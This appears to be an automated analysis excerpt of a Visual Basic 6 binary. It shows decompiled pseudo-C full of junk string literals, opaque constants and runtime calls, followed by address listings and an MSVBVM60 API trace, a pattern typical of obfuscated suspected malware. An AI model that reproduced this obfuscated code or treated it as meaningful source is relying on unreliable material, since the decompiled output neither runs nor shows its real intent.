				L00401810();
				_v272 = 0xfffffff9;
				_v280 = 0x8002;
				_push( &_v200);
				_t671 =  &_v280;
				_push(_t671);
				L00401816();
				_v380 = _t671;
				_push( &_v200);
				_push( &_v184);
				_push(2);
				L00401840();
				_t1070 = _t1069 + 0xc;
				if(_v380 != 0) {
					_v176 = 1;
					_v184 = 2;
					_push(0);
					_push( &_v184);
					L00401804();
					L0040183A();
					L00401828();
					_push( &_v184);
					L004017FE();
					_push( &_v184);
					L00401834();
					L0040183A();
					L00401828();
				}
				_v272 = L"replicr";
				_v280 = 8;
				L0040184C();
				_t675 =  &_v184;
				_push(_t675);
				L004017F8();
				_v380 =  ~(0 | _t675 - 0x0000ffff <= 0x00000000);
				L00401828();
				_t676 = _v380;
				if(_t676 != 0) {
					 *_v64 = 0x579;
					 *((short*)(_v64 + 2)) = 0x23c6;
					_v176 = 0x80020004;
					_v184 = 0xa;
					_t882 =  &_v184;
					_push(_t882);
					L004017F2();
					_t989 = 2;
					 *((short*)(_v64 + (_t989 << 1))) = _t882;
					L00401828();
					_t883 = 2;
					 *((short*)(_v64 + _t883 * 3)) = 0x3c46;
					_t885 = 2;
					 *((short*)(_v64 + (_t885 << 2))) = 0x2b65;
					_t887 = 2;
					 *((short*)(_v64 + _t887 * 5)) = 0x4c1;
					_t889 = 2;
					 *((short*)(_v64 + _t889 * 6)) = 0x1d9a;
					_v272 = 0x402538;
					_v280 = 8;
					L0040184C();
					_t891 =  &_v184;
					_push(_t891);
					_push(0x10);
					L004017DA();
					L0040183A();
					_push(_t891);
					L004017E0();
					_v192 = _t891;
					_v200 = 3;
					_t892 =  &_v200;
					_push(_t892);
					L004017E6();
					L0040183A();
					_push(_t892);
					L004017EC();
					_t999 = 2;
					 *((short*)(_v64 + _t999 * 7)) = _t892;
					_push( &_v148);
					_push( &_v144);
					_push(2);
					L004017D4();
					_push( &_v200);
					_push( &_v184);
					_push(2);
					L00401840();
					_t1070 = _t1070 + 0x18;
					_t897 = 2;
					 *((short*)(_v64 + (_t897 << 3))) = 0xfe2;
					_t899 = 2;
					 *((short*)(_v64 + _t899 * 9)) = 0x2b08;
					_t901 = 2;
					 *((short*)(_v64 + _t901 * 0xa)) = 0x5426;
					_v176 = 0x80020004;
					_v184 = 0xa;
					_t903 =  &_v184;
					_push(_t903);
					L004017F2();
					_t1004 = 2;
					 *((short*)(_v64 + _t1004 * 0xb)) = _t903;
					L00401828();
					_t904 = 2;
					 *((short*)(_v64 + _t904 * 0xc)) = 0x368d;
					_t906 = 2;
					 *((short*)(_v64 + _t906 * 0xd)) = 0x142;
					_t908 = 2;
					_t909 = _t908 * 0xe;
					 *((short*)(_v64 + _t909)) = 0x34bb;
					_push(L"OFFENTLIGHEDSSFRE");
					L004017EC();
					_t1010 = 2;
					 *(_v64 + _t1010 * 0xf) = _t909;
					_t910 = 2;
					 *((short*)(_v64 + (_t910 << 4))) = 0x45bc;
					_t912 = 2;
					 *((short*)(_v64 + _t912 * 0x11)) = 0x530e;
					_t914 = 2;
					_t915 = _t914 * 0x12;
					 *((short*)(_v64 + _t915)) = 0x6a6e;
					_push(L"Dagvagten");
					L004017EC();
					_t1015 = 2;
					 *(_v64 + _t1015 * 0x13) = _t915;
					if( *0x4223c0 != 0) {
						_v436 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x40259c);
						L004017CE();
						_v436 = 0x4223c0;
					}
					_v380 =  *_v436;
					_t921 =  *((intOrPtr*)( *_v380 + 0x14))(_v380,  &_v168);
					asm("fclex");
					_v384 = _t921;
					if(_v384 >= 0) {
						_v440 = _v440 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40258c);
						_push(_v380);
						_push(_v384);
						L004017C8();
						_v440 = _t921;
					}
					_v388 = _v168;
					_t926 =  *((intOrPtr*)( *_v388 + 0x70))(_v388,  &_v332);
					asm("fclex");
					_v392 = _t926;
					if(_v392 >= 0) {
						_v444 = _v444 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x4025ac);
						_push(_v388);
						_push(_v392);
						L004017C8();
						_v444 = _t926;
					}
					_t676 = _v332;
					_v104 = _t676;
					L004017C2();
				}
				L004017BC();
				L0040183A();
				L004017BC();
				L0040183A();
				_v404 = _v152;
				_v152 = _v152 & 0x00000000;
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v148, 0x790eaf, 0x4849, 0x51ac, _t676, L"tilskrersaksene");
				L004017D4();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t685 =  &_v184;
				L004017F2();
				_v344 = _t685;
				_v336 = 0x6988;
				L004017B6();
				_v348 = 0x10e914;
				_v332 = _v344;
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v332,  &_v348, 0x2f8e,  &_v144,  &_v336,  &_v340, _t685, 3,  &_v144,  &_v148,  &_v152);
				_t695 = _v340;
				_v52 = _t695;
				L00401846();
				L00401828();
				_v348 = 0x40f600;
				L004017B0();
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x730))(_a4,  &_v348, _t695, L"Forretningsbrevet5");
				L00401846();
				L004017B6();
				_t704 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, 0x17c6,  &_v144,  &_v148);
				_v380 = _t704;
				if(_v380 >= 0) {
					_v448 = _v448 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(E00402340);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v448 = _t704;
				}
				_v408 = _v148;
				_v148 = _v148 & 0x00000000;
				L0040183A();
				L00401846();
				L004017AA();
				_v368 = _t1082;
				_v176 = _v368;
				_v184 = 4;
				_push( &_v200);
				_t707 =  &_v184;
				_push(_t707);
				L004017A4();
				_v380 = _t707;
				if(_v380 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v452 = _t707;
				}
				L00401792();
				_t708 =  &_v168;
				L00401798();
				_v384 = _t708;
				_t712 =  *((intOrPtr*)( *_v384 + 0x1c))(_v384,  &_v348, _t708, _t707);
				asm("fclex");
				_v388 = _t712;
				if(_v388 >= 0) {
					_v456 = _v456 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x40264c);
					_push(_v384);
					_push(_v388);
					L004017C8();
					_v456 = _t712;
				}
				_v364 = 0xed488;
				_v360 = 0x711cb2;
				_t713 =  &_v200;
				L0040178C();
				_v356 = _t713;
				_v352 = 0x23dec;
				_t720 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v352, 0x3e2bce,  &_v356, _v348,  &_v360,  &_v364, _t713);
				_v392 = _t720;
				if(_v392 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(E00402340);
					_push(_a4);
					_push(_v392);
					L004017C8();
					_v460 = _t720;
				}
				L004017C2();
				_t722 =  &_v184;
				L00401840();
				L00401786();
				L0040183A();
				L004017EC();
				_v340 = _t722;
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t723 =  &_v184;
				L004017F2();
				_v344 = _t723;
				L00401780();
				_v348 = _t723;
				_v336 = _v344;
				_v332 = _v340;
				_t731 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v332, L"blaarv", 0x35a58,  &_v336,  &_v348, _t723, _t722, 0x9b, 2, _t722,  &_v200);
				_v380 = _t731;
				if(_v380 >= 0) {
					_v464 = _v464 & 0x00000000;
				} else {
					_push(0x700);
					_push(E00402340);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v464 = _t731;
				}
				L00401846();
				L00401828();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t732 =  &_v184;
				L004017F2();
				_v336 = _t732;
				_v332 = _v336;
				_t737 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v332, L"Lersernes", _t732);
				_v380 = _t737;
				if(_v380 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0x704);
					_push(E00402340);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v468 = _t737;
				}
				L00401828();
				_v176 = 0x80020004;
				_v184 = 0xa;
				_t738 =  &_v184;
				_push(_t738);
				L004017F2();
				_v336 = _t738;
				_v192 =  *0x40124c;
				_v200 = 4;
				_push(0);
				_push( &_v200);
				_push( &_v216);
				L0040177A();
				_v224 = 0x80020004;
				_v232 = 0xa;
				_t741 =  &_v232;
				_push(_t741);
				L004017F2();
				_v340 = _t741;
				_t1086 =  *0x401248;
				_v240 = _t1086;
				_v248 = 4;
				_push( &_v264);
				_t743 =  &_v248;
				_push(_t743);
				L004017A4();
				_v380 = _t743;
				if(_v380 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v472 = _t743;
				}
				_v332 = _v340;
				_v352 = 0x1eaaee;
				_t745 =  &_v216;
				L0040178C();
				_v348 = _t745;
				_t747 =  &_v264;
				L0040178C();
				 *((intOrPtr*)( *_a4 + 0x734))(_a4, _v336,  &_v348,  &_v352, L"Snoreskrternes8",  &_v332, L"tril", _t747, _t747,  &_v356, _t745);
				_v136 = _v356;
				L00401840();
				L00401774();
				_v376 = _t1086;
				L0040185E();
				L0040183A();
				_t761 = _v156;
				_v412 = _t761;
				_v156 = _v156 & 0x00000000;
				L0040176E();
				_v348 = _t761;
				L004017B6();
				_t762 =  &_v152;
				L0040183A();
				 *((intOrPtr*)( *_a4 + 0x738))(_a4,  &_v144,  &_v348, _t762, L"Benefact6", _t762, L"RODTEGNENES", L"eudaemonistical", 6,  &_v184,  &_v200,  &_v232,  &_v248,  &_v216,  &_v264);
				_v416 = _v152;
				_v152 = _v152 & 0x00000000;
				L0040183A();
				_t771 =  &_v144;
				L004017D4();
				L004017EC();
				_v336 = _t771;
				_v176 = 0x1ca534;
				_v184 = 3;
				_t772 =  &_v184;
				L004017E6();
				L0040183A();
				L00401768();
				_v352 = _t772;
				_v332 = _v336;
				_v348 = 0x761fa7;
				_t776 =  &_v332;
				L00401762();
				_t780 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v348, _t776, L"Whiskysourens1", _t776,  &_v352,  &_v144, _t772, L"ADMIRINGLY", 3, _t771,  &_v148,  &_v156);
				_v380 = _t780;
				if(_v380 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x708);
					_push(E00402340);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v476 = _t780;
				}
				L00401846();
				L00401828();
				L004017EC();
				_v340 = _t780;
				_v332 = 0x640;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, _v340,  &_v332,  &_v336, L"Kainsmrkernes3");
				_v132 = _v336;
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v332);
				_v84 = _v332;
				_v336 = 0x393d;
				_v332 = 0x67ff;
				L004017B6();
				_t797 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, L"Odontoma7", L"undrede",  &_v144, 0x2745,  &_v332, 0x239fb0,  &_v336);
				_v380 = _t797;
				if(_v380 >= 0) {
					_v480 = _v480 & 0x00000000;
				} else {
					_push(0x70c);
					_push(E00402340);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v480 = _t797;
				}
				L00401846();
				_v352 = 0x419a61;
				_v348 = 0x5ea767;
				_t802 =  *((intOrPtr*)( *_a4 + 0x710))(_a4, L"Utrecht8",  &_v348, 0x5f1f,  &_v352);
				_v380 = _t802;
				if(_v380 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x710);
					_push(E00402340);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v484 = _t802;
				}
				_v272 = 0x402840;
				_v280 = 8;
				L0040184C();
				L0040175C();
				L00401834();
				L0040183A();
				L004017B6();
				_v336 = 0x54f7;
				_v332 = 0x147e;
				_t808 =  &_v144;
				L00401762();
				 *((intOrPtr*)( *_a4 + 0x744))(_a4,  &_v332, 0x5c23,  &_v336, _t808, L"Udstillingslokalet", _t808,  &_v148, 0xfffc6,  &_v348,  &_v200,  &_v200, 0x65,  &_v184);
				_v44 = _v348;
				L004017D4();
				L00401840();
				_v176 = 0xfffffff6;
				_v184 = 2;
				_t819 =  &_v184;
				L00401804();
				L0040183A();
				L00401762();
				_t822 =  *((intOrPtr*)( *_a4 + 0x714))(_a4, 0xf03, _t819, _t819, _t819, 0, 2,  &_v184,  &_v200, 2,  &_v144,  &_v148);
				_v380 = _t822;
				if(_v380 >= 0) {
					_v488 = _v488 & 0x00000000;
				} else {
					_push(0x714);
					_push(E00402340);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v488 = _t822;
				}
				L00401846();
				L00401828();
				L004017E0();
				_v348 = _t822;
				_t827 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v348, 0x472f27, 0x451752,  &_v352, L"Generalisations7");
				_v380 = _t827;
				if(_v380 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x718);
					_push(E00402340);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v492 = _t827;
				}
				_v100 = _v352;
				L00401756();
				L0040183A();
				L00401750();
				L0040183A();
				_v420 = _v164;
				_v164 = _v164 & 0x00000000;
				L0040183A();
				_v424 = _v160;
				_v160 = _v160 & 0x00000000;
				L004017B6();
				_t832 =  &_v152;
				L0040183A();
				_t836 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v144, _t832, _t832, L"SOLITRSKAKKEN", L"Indvi2", L"Fdres",  &_v156, L"STRUTTENDE", 0x17, 0x67);
				_v380 = _t836;
				if(_v380 >= 0) {
					_v496 = _v496 & 0x00000000;
				} else {
					_push(0x71c);
					_push(E00402340);
					_push(_a4);
					_push(_v380);
					L004017C8();
					_v496 = _t836;
				}
				_v428 = _v156;
				_v156 = _v156 & 0x00000000;
				L0040183A();
				_push( &_v164);
				_push( &_v160);
				_push( &_v152);
				_push( &_v148);
				_t842 =  &_v144;
				_push(_t842);
				_push(5);
				L004017D4();
				asm("fabs");
				_v176 =  *0x401238;
				asm("fnstsw ax");
				if((_t842 & 0x0000000d) != 0) {
					return __imp____vbaFPException();
				}
				_v184 = 5;
				_push( &_v200);
				_t845 =  &_v184;
				_push(_t845);
				L004017A4();
				_v380 = _t845;
				if(_v380 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(_v380);
					L0040179E();
					_v500 = _t845;
				}
				L0040182E();
				_t848 =  &_v144;
				L00401858();
				L004017BC();
				L0040183A();
				_v224 = 0x80020004;
				_v232 = 0xa;
				_t849 =  &_v232;
				L004017F2();
				_v340 = _t849;
				_v332 = _v340;
				_v432 = _v152;
				_v152 = _v152 & 0x00000000;
				_t853 =  &_v332;
				L0040183A();
				_t854 =  &_v200;
				L0040178C();
				_t857 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, _t854, _t854, _t853, _t853, 0x3d78c1,  &_v336, _t849, _t848, _t848,  &_v216,  &_v216, L"16:16:16");
				_v384 = _t857;
				if(_v384 >= 0) {
					_v504 = _v504 & 0x00000000;
				} else {
					_push(0x720);
					_push(E00402340);
					_push(_a4);
					_push(_v384);
					L004017C8();
					_v504 = _t857;
				}
				_v92 = _v336;
				L004017D4();
				_t865 =  &_v184;
				L00401840();
				L004017EC();
				_v336 = _t865;
				L004017EC();
				_v340 = _t865;
				L004017B6();
				_v332 = 0x2885;
				 *((intOrPtr*)( *_a4 + 0x748))(_a4, _v336, L"SELVFINANSIEREDES",  &_v332, _v340,  &_v144, 0x5929, 0x402948, 0x402900, 4, _t865,  &_v216,  &_v232,  &_v200, 3,  &_v144,  &_v148,  &_v152);
				L00401846();
				E0042166C();
				_v272 = 2;
				_v280 = 2;
				L0040174A();
				_v272 = 0x806d96;
				_v280 = 3;
				L0040174A();
				_t874 =  &_v184;
				L00401744();
				L0040178C();
				 *((intOrPtr*)( *_a4 + 0x74c))(_a4, _t874, _t874, _t874,  &_v40,  &_v128);
				_v8 = 0;
				asm("wait");
				_push(0x41dd58);
				L00401828();
				L00401846();
				_v348 =  &_v76;
				_t879 =  &_v348;
				_push(_t879);
				_push(0);
				L0040173E();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401828();
				L00401846();
				return _t879;
			}

0x0041c6c7
0x0041c6d6
0x0041c6e2
0x0041c6ea
0x0041c6ed
0x0041c6fa
0x0041c703
0x0041c70e
0x0041c711
0x0041c713
0x0041c71b
0x0041c71c
0x0041c721
0x0041c72b
0x0041c741
0x0041c74c
0x0041c753
0x0041c754
0x0041c75f
0x0041c760
0x0041c766
0x0041c767
0x0041c76c
0x0041c76d
0x0041c772
0x0041c778
0x0041c782
0x0041c788
0x0041c789
0x0041c791
0x0041c796
0x0041c79d
0x0041c7a3
0x0041c7ae
0x0041c7b5
0x0041c7bc
0x0041c7bd
0x0041c7bf
0x0041c7c4
0x0041c7d0
0x0041c7d6
0x0041c7db
0x0041c7e1
0x0041c7e2
0x0041c7e7
0x0041c7ed
0x0041c7ee
0x0041c7f8
0x0041c803
0x0041c808
0x0041c812
0x0041c828
0x0041c82d
0x0041c833
0x0041c834
0x0041c83a
0x0041c83b
0x0041c840
0x0041c846
0x0041c847
0x0041c84e
0x0041c854
0x0041c859
0x0041c85e
0x0041c863
0x0041c86e
0x0041c873
0x0041c879
0x0041c87a
0x0041c880
0x0041c881
0x0041c883
0x0041c888
0x0041c888
0x0041c891
0x0041c892
0x0041c89d
0x0041c89e
0x0041c8a4
0x0041c8a5
0x0041c8a6
0x0041c8a9
0x0041c8b4
0x0041c8b5
0x0041c8ba
0x0041c8c4
0x0041c8d4
0x0041c8d5
0x0041c8db
0x0041c8dc
0x0041c8e1
0x0041c8ee
0x0041c8f5
0x0041c8f6
0x0041c8f8
0x0041c8fd
0x0041c909
0x0041c90b
0x0041c915
0x0041c91f
0x0041c927
0x0041c928
0x0041c932
0x0041c93d
0x0041c948
0x0041c949
0x0041c954
0x0041c955
0x0041c95f
0x0041c96a
0x0041c96a
0x0041c96f
0x0041c979
0x0041c98f
0x0041c994
0x0041c99a
0x0041c99b
0x0041c9ab
0x0041c9b8
0x0041c9bd
0x0041c9c6
0x0041c9cf
0x0041c9d7
0x0041c9dd
0x0041c9e7
0x0041c9f1
0x0041c9f7
0x0041c9f8
0x0041c9ff
0x0041ca05
0x0041ca0f
0x0041ca16
0x0041ca1d
0x0041ca25
0x0041ca2c
0x0041ca34
0x0041ca3b
0x0041ca43
0x0041ca4a
0x0041ca50
0x0041ca5a
0x0041ca70
0x0041ca75
0x0041ca7b
0x0041ca7c
0x0041ca7e
0x0041ca8b
0x0041ca90
0x0041ca91
0x0041ca96
0x0041ca9c
0x0041caa6
0x0041caac
0x0041caad
0x0041caba
0x0041cabf
0x0041cac0
0x0041cac7
0x0041cace
0x0041cad8
0x0041cadf
0x0041cae0
0x0041cae2
0x0041caf0
0x0041caf7
0x0041caf8
0x0041cafa
0x0041caff
0x0041cb04
0x0041cb0b
0x0041cb13
0x0041cb1a
0x0041cb22
0x0041cb29
0x0041cb2f
0x0041cb39
0x0041cb43
0x0041cb49
0x0041cb4a
0x0041cb51
0x0041cb58
0x0041cb62
0x0041cb69
0x0041cb70
0x0041cb78
0x0041cb7f
0x0041cb87
0x0041cb88
0x0041cb8e
0x0041cb94
0x0041cb99
0x0041cba0
0x0041cba7
0x0041cbad
0x0041cbb4
0x0041cbbc
0x0041cbc3
0x0041cbcb
0x0041cbcc
0x0041cbd2
0x0041cbd8
0x0041cbdd
0x0041cbe4
0x0041cbeb
0x0041cbf6
0x0041cc13
0x0041cbf8
0x0041cbf8
0x0041cbfd
0x0041cc02
0x0041cc07
0x0041cc07
0x0041cc25
0x0041cc40
0x0041cc43
0x0041cc45
0x0041cc52
0x0041cc74
0x0041cc54
0x0041cc54
0x0041cc56
0x0041cc5b
0x0041cc61
0x0041cc67
0x0041cc6c
0x0041cc6c
0x0041cc81
0x0041cc9c
0x0041cc9f
0x0041cca1
0x0041ccae
0x0041ccd0
0x0041ccb0
0x0041ccb0
0x0041ccb2
0x0041ccb7
0x0041ccbd
0x0041ccc3
0x0041ccc8
0x0041ccc8
0x0041ccd7
0x0041ccde
0x0041cce8
0x0041cce8
0x0041ccf2
0x0041ccff
0x0041cd05
0x0041cd12
0x0041cd1d
0x0041cd23
0x0041cd36
0x0041cd59
0x0041cd76
0x0041cd7e
0x0041cd88
0x0041cd92
0x0041cd99
0x0041cd9e
0x0041cda5
0x0041cdb9
0x0041cdbe
0x0041cdcf
0x0041ce06
0x0041ce0c
0x0041ce13
0x0041ce1d
0x0041ce28
0x0041ce2d
0x0041ce3c
0x0041ce49
0x0041ce5e
0x0041ce6a
0x0041ce7a
0x0041ce9a
0x0041cea0
0x0041cead
0x0041cecf
0x0041ceaf
0x0041ceaf
0x0041ceb4
0x0041ceb9
0x0041cebc
0x0041cec2
0x0041cec7
0x0041cec7
0x0041cedc
0x0041cee2
0x0041cef2
0x0041cefd
0x0041cf02
0x0041cf07
0x0041cf13
0x0041cf19
0x0041cf29
0x0041cf2a
0x0041cf30
0x0041cf31
0x0041cf36
0x0041cf43
0x0041cf58
0x0041cf45
0x0041cf45
0x0041cf4b
0x0041cf50
0x0041cf50
0x0041cf5f
0x0041cf65
0x0041cf6c
0x0041cf71
0x0041cf8c
0x0041cf8f
0x0041cf91
0x0041cf9e
0x0041cfc0
0x0041cfa0
0x0041cfa0
0x0041cfa2
0x0041cfa7
0x0041cfad
0x0041cfb3
0x0041cfb8
0x0041cfb8
0x0041cfc7
0x0041cfd1
0x0041cfdb
0x0041cfe2
0x0041cfe7
0x0041cfed
0x0041d026
0x0041d02c
0x0041d039
0x0041d05b
0x0041d03b
0x0041d03b
0x0041d040
0x0041d045
0x0041d048
0x0041d04e
0x0041d053
0x0041d053
0x0041d068
0x0041d074
0x0041d07d
0x0041d08a
0x0041d097
0x0041d09d
0x0041d0a2
0x0041d0a9
0x0041d0b3
0x0041d0bd
0x0041d0c4
0x0041d0c9
0x0041d0d6
0x0041d0db
0x0041d0e8
0x0041d0f6
0x0041d124
0x0041d12a
0x0041d137
0x0041d159
0x0041d139
0x0041d139
0x0041d13e
0x0041d143
0x0041d146
0x0041d14c
0x0041d151
0x0041d151
0x0041d166
0x0041d171
0x0041d176
0x0041d180
0x0041d18a
0x0041d191
0x0041d196
0x0041d1a4
0x0041d1bf
0x0041d1c5
0x0041d1d2
0x0041d1f4
0x0041d1d4
0x0041d1d4
0x0041d1d9
0x0041d1de
0x0041d1e1
0x0041d1e7
0x0041d1ec
0x0041d1ec
0x0041d201
0x0041d206
0x0041d210
0x0041d21a
0x0041d220
0x0041d221
0x0041d226
0x0041d233
0x0041d239
0x0041d243
0x0041d24b
0x0041d252
0x0041d253
0x0041d258
0x0041d262
0x0041d26c
0x0041d272
0x0041d273
0x0041d278
0x0041d27f
0x0041d285
0x0041d28b
0x0041d29b
0x0041d29c
0x0041d2a2
0x0041d2a3
0x0041d2a8
0x0041d2b5
0x0041d2ca
0x0041d2b7
0x0041d2b7
0x0041d2bd
0x0041d2c2
0x0041d2c2
0x0041d2d8
0x0041d2df
0x0041d2e9
0x0041d2f0
0x0041d2f5
0x0041d302
0x0041d309
0x0041d33c
0x0041d348
0x0041d37a
0x0041d387
0x0041d38c
0x0041d397
0x0041d3a4
0x0041d3a9
0x0041d3af
0x0041d3b5
0x0041d3c2
0x0041d3c7
0x0041d3d8
0x0041d3dd
0x0041d3f5
0x0041d411
0x0041d41d
0x0041d423
0x0041d436
0x0041d449
0x0041d452
0x0041d45f
0x0041d464
0x0041d46b
0x0041d475
0x0041d47f
0x0041d486
0x0041d493
0x0041d49e
0x0041d4a3
0x0041d4b0
0x0041d4b7
0x0041d4cf
0x0041d4db
0x0041d4f0
0x0041d4f6
0x0041d503
0x0041d525
0x0041d505
0x0041d505
0x0041d50a
0x0041d50f
0x0041d512
0x0041d518
0x0041d51d
0x0041d51d
0x0041d532
0x0041d53d
0x0041d547
0x0041d54c
0x0041d553
0x0041d578
0x0041d585
0x0041d598
0x0041d5a5
0x0041d5a9
0x0041d5b2
0x0041d5c6
0x0041d5fc
0x0041d602
0x0041d60f
0x0041d631
0x0041d611
0x0041d611
0x0041d616
0x0041d61b
0x0041d61e
0x0041d624
0x0041d629
0x0041d629
0x0041d63e
0x0041d643
0x0041d64d
0x0041d677
0x0041d67d
0x0041d68a
0x0041d6ac
0x0041d68c
0x0041d68c
0x0041d691
0x0041d696
0x0041d699
0x0041d69f
0x0041d6a4
0x0041d6a4
0x0041d6b3
0x0041d6bd
0x0041d6d3
0x0041d6e8
0x0041d6f4
0x0041d701
0x0041d711
0x0041d716
0x0041d71f
0x0041d73b
0x0041d747
0x0041d768
0x0041d774
0x0041d787
0x0041d79f
0x0041d7a7
0x0041d7b1
0x0041d7bd
0x0041d7c4
0x0041d7d1
0x0041d7d7
0x0041d7ea
0x0041d7f0
0x0041d7fd
0x0041d81f
0x0041d7ff
0x0041d7ff
0x0041d804
0x0041d809
0x0041d80c
0x0041d812
0x0041d817
0x0041d817
0x0041d82c
0x0041d837
0x0041d841
0x0041d846
0x0041d86c
0x0041d872
0x0041d87f
0x0041d8a1
0x0041d881
0x0041d881
0x0041d886
0x0041d88b
0x0041d88e
0x0041d894
0x0041d899
0x0041d899
0x0041d8ae
0x0041d8b3
0x0041d8c0
0x0041d8cc
0x0041d8d9
0x0041d8e4
0x0041d8ea
0x0041d8fd
0x0041d908
0x0041d90e
0x0041d920
0x0041d93b
0x0041d94e
0x0041d963
0x0041d969
0x0041d976
0x0041d998
0x0041d978
0x0041d978
0x0041d97d
0x0041d982
0x0041d985
0x0041d98b
0x0041d990
0x0041d990
0x0041d9a5
0x0041d9ab
0x0041d9bb
0x0041d9c6
0x0041d9cd
0x0041d9d4
0x0041d9db
0x0041d9dc
0x0041d9e2
0x0041d9e3
0x0041d9e5
0x0041d9f3
0x0041d9f5
0x0041d9fb
0x0041d9ff
0x0040154c
0x0040154c
0x0041da05
0x0041da15
0x0041da16
0x0041da1c
0x0041da1d
0x0041da22
0x0041da2f
0x0041da44
0x0041da31
0x0041da31
0x0041da37
0x0041da3c
0x0041da3c
0x0041da57
0x0041da63
0x0041da6a
0x0041da70
0x0041da7d
0x0041da82
0x0041da8c
0x0041da96
0x0041da9d
0x0041daa2
0x0041dab0
0x0041dabd
0x0041dac3
0x0041dad6
0x0041dae9
0x0041daef
0x0041daf6
0x0041db04
0x0041db0a
0x0041db17
0x0041db39
0x0041db19
0x0041db19
0x0041db1e
0x0041db23
0x0041db26
0x0041db2c
0x0041db31
0x0041db31
0x0041db47
0x0041db62
0x0041db7f
0x0041db88
0x0041db95
0x0041db9a
0x0041dba6
0x0041dbab
0x0041dbbd
0x0041dbc2
0x0041dbf7
0x0041dc03
0x0041dc08
0x0041dc0d
0x0041dc17
0x0041dc2a
0x0041dc2f
0x0041dc39
0x0041dc4c
0x0041dc59
0x0041dc60
0x0041dc66
0x0041dc74
0x0041dc7a
0x0041dc81
0x0041dc82
0x0041dd00
0x0041dd08
0x0041dd10
0x0041dd16
0x0041dd1c
0x0041dd1d
0x0041dd1f
0x0041dd27
0x0041dd2f
0x0041dd37
0x0041dd3f
0x0041dd47
0x0041dd52
0x0041dd57

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041C6E2
__vbaAryConstruct2.MSVBVM60(?,004029AC,00000002,?,?,?,?,00401546), ref: 0041C71C
__vbaVarDup.MSVBVM60 ref: 0041C741
#522.MSVBVM60(?,?), ref: 0041C754
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C767
#713.MSVBVM60(00000000,?,?,?,?), ref: 0041C76D
#558.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C789
__vbaFreeStr.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C7A3
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000008,00000008,00000000,?,?,?,?), ref: 0041C7BF
#541.MSVBVM60(?,7:7:7,?,?,?,00401546), ref: 0041C7E2
__vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C7EE
__vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C7F8
__vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C803
__vbaVarDup.MSVBVM60 ref: 0041C828
#524.MSVBVM60(?,?), ref: 0041C83B
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C84E
#690.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C863
__vbaFreeStr.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C86E
__vbaFreeVarList.MSVBVM60(00000002,?,?,multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C883
#610.MSVBVM60(?,?,?,?,00401546), ref: 0041C892
#661.MSVBVM60(?,0040251C,?,?,?,?,?,?,?,00401546), ref: 0041C8B5
__vbaVarTstGe.MSVBVM60(00008002,?), ref: 0041C8DC
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 0041C8F8
#705.MSVBVM60(00000002,00000000), ref: 0041C928
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041C932
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041C93D
#670.MSVBVM60(00000002,00000002,00000000), ref: 0041C949
__vbaStrVarMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C955
__vbaStrMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C95F
__vbaFreeVar.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C96A
__vbaVarDup.MSVBVM60 ref: 0041C98F
#560.MSVBVM60(?), ref: 0041C99B
__vbaFreeVar.MSVBVM60(?), ref: 0041C9B8
#648.MSVBVM60(0000000A,?), ref: 0041C9F8
